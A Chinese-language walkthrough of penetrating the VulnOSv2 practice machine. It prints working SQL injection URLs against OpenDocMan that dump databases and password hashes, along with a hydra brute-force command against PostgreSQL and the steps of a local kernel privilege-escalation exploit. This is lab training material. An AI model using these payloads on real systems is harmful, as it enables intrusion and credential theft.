当前位置: 首页 > news >正文

VulnOSv2 靶机渗透测试

春秋蝉鸣少年归~


arp发现靶机ip地址

发现开放80端口那先去访问一下

问题不大,没有什么有用的提示那就上dirb跑一下

这里给了一个版本号

通过searchsploit搜索了一下没有这个版本的poc/exp去网上搜搜看

这个也试了一下也利用不了回到页面上发现有个website可以点

然后我们会来到一个新的网站

最终在每个页面都看了一下,发现这个页面的鼠标放上去鼠标会变,这里也是给了账号密码

通过提示我们用给的用户名和密码去访问一下

来到这个地方我们发现一个大大的logo就是这个opendocman,还是老样子去searchsploit搜索一下刚好有一个符合的

拿到当前目录下好好看看

这个意思是有两个漏洞可以用一个sql注入一个权限提升的

尝试利用
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9

爆破库名
192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user  UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata

爆表
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()

字段
192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()

查表
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x6f646d5f75736572
佬说这里有一个注意点,就是用字符串表名来查表的时候查不出来,需要把表的字符串换成16进制0x6f646d5f75736572

查密码
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(username,password),3,4,5,6,7,8,9 from odm_user

给了两个密码咱们都试试

ssh直接连

进来先用python获取一个交互式shell,可以看到内核是一个低版本的去search一下

有两个符合先试试.c

将.c文件wget到tmp目录下,看看.c怎么执行的,编译后./ofs执行提权脚本,成功获取权限

第二种方式 解压目录下的文件夹,hydra

./confingure好了之后告诉我们make

安装成功

ps -aux时发现postgres进行信息,还有hydra尝试进行一下爆破

来到usr/share/wordlists/metasploit目录下面有postgres的默认密码和用户的密码本这样结合hydra爆破一下

./hydra -L user.txt -P passwd.txt localhost postgres

登录postgres psql -h localhost -U postgres

查看database

\c 进入到这个system

SLECT * FROM users;

su切换到vulnosadmin 查看有一个r00t.blend 通过cp挂在html目录下

wget下载r00t.blend

来到这个https://imagetostl.com/cn/view-blend-online网站下点击上传就可以看到,然后用密码登录root即可ab12fg//drg


文章转载自:

http://ga8WzRak.cjqqj.cn
http://GD1YxVDA.cjqqj.cn
http://mUw0xIAE.cjqqj.cn
http://KiBVOD6K.cjqqj.cn
http://IHO0xkM8.cjqqj.cn
http://eWk8wRwi.cjqqj.cn
http://n1i7kLwk.cjqqj.cn
http://Cfy8EF70.cjqqj.cn
http://D7c2y8ZT.cjqqj.cn
http://LcvH3uSh.cjqqj.cn
http://s6ZuYiME.cjqqj.cn
http://04ApmNcS.cjqqj.cn
http://hoBD4FJn.cjqqj.cn
http://1lDykxVe.cjqqj.cn
http://3XhzNwGv.cjqqj.cn
http://0SPubwZt.cjqqj.cn
http://9be9qPcE.cjqqj.cn
http://MnmR07IG.cjqqj.cn
http://TP5tj5ul.cjqqj.cn
http://MLlXDvTB.cjqqj.cn
http://h63IgjzQ.cjqqj.cn
http://cpeAqXCi.cjqqj.cn
http://TBlxRMUn.cjqqj.cn
http://BObDR1gK.cjqqj.cn
http://IYUrYieP.cjqqj.cn
http://lIKpZzwc.cjqqj.cn
http://8d35Ul4c.cjqqj.cn
http://G7B9dqlT.cjqqj.cn
http://W6XZHT5A.cjqqj.cn
http://I90BqeOR.cjqqj.cn
http://www.dtcms.com/a/33406.html

相关文章:

  • 基于 Python Django 的校园互助平台(附源码,文档)
  • python使用httpx_sse调用sse流式接口对响应格式为application/json的错误信息的处理
  • 内网网络安全的解决之道
  • Linux MySQL 8.0.29 忽略表名大小写配置
  • 深入理解 DOM 和 CSSOM:网页渲染的核心
  • PAT甲级 1017 Queueing at Bank
  • easyexcel和poi同时存在版本问题,使用easyexcel导出excel设置日期格式
  • ZJYYC2510. 蓝红球
  • 财务运营域——营收稽核系统设计
  • 内存对齐的原因和规则
  • C++中,运算符重载,+,-,*,/,=,+=,[]的使用
  • 利用Ai对生成的测试用例进行用例评审
  • Spring MVC 与 Spring Boot:从“手动挡”到“自动驾驶”的进化论,兼谈前后端分离的哲学
  • 单机上使用docker搭建minio集群
  • 3分钟快速本地部署deepseek
  • 网站快速收录:如何优化网站内部搜索功能?
  • Python学习总结
  • 【量化策略】双均线交叉策略
  • transformer架构嵌入层位置编码之RoPE旋转位置编码及简单实现示例
  • python读取sqlite温度数据,并画出折线图
  • 自己的百科词条能删掉吗?个人如何删除自己的百科词条?
  • 电动机能耗制动控制电路
  • SVM 支持向量机
  • Java笔记18
  • 前缀和与差分
  • 【深度学习】Adam和AdamW优化器有什么区别,以及为什么Adam会被自适应学习率影响
  • 鸿蒙开发深入浅出03(封装通用LazyForEach实现懒加载)
  • MySQL 数据库基础
  • Ryu控制器:L2交换功能实现案例
  • 帆软report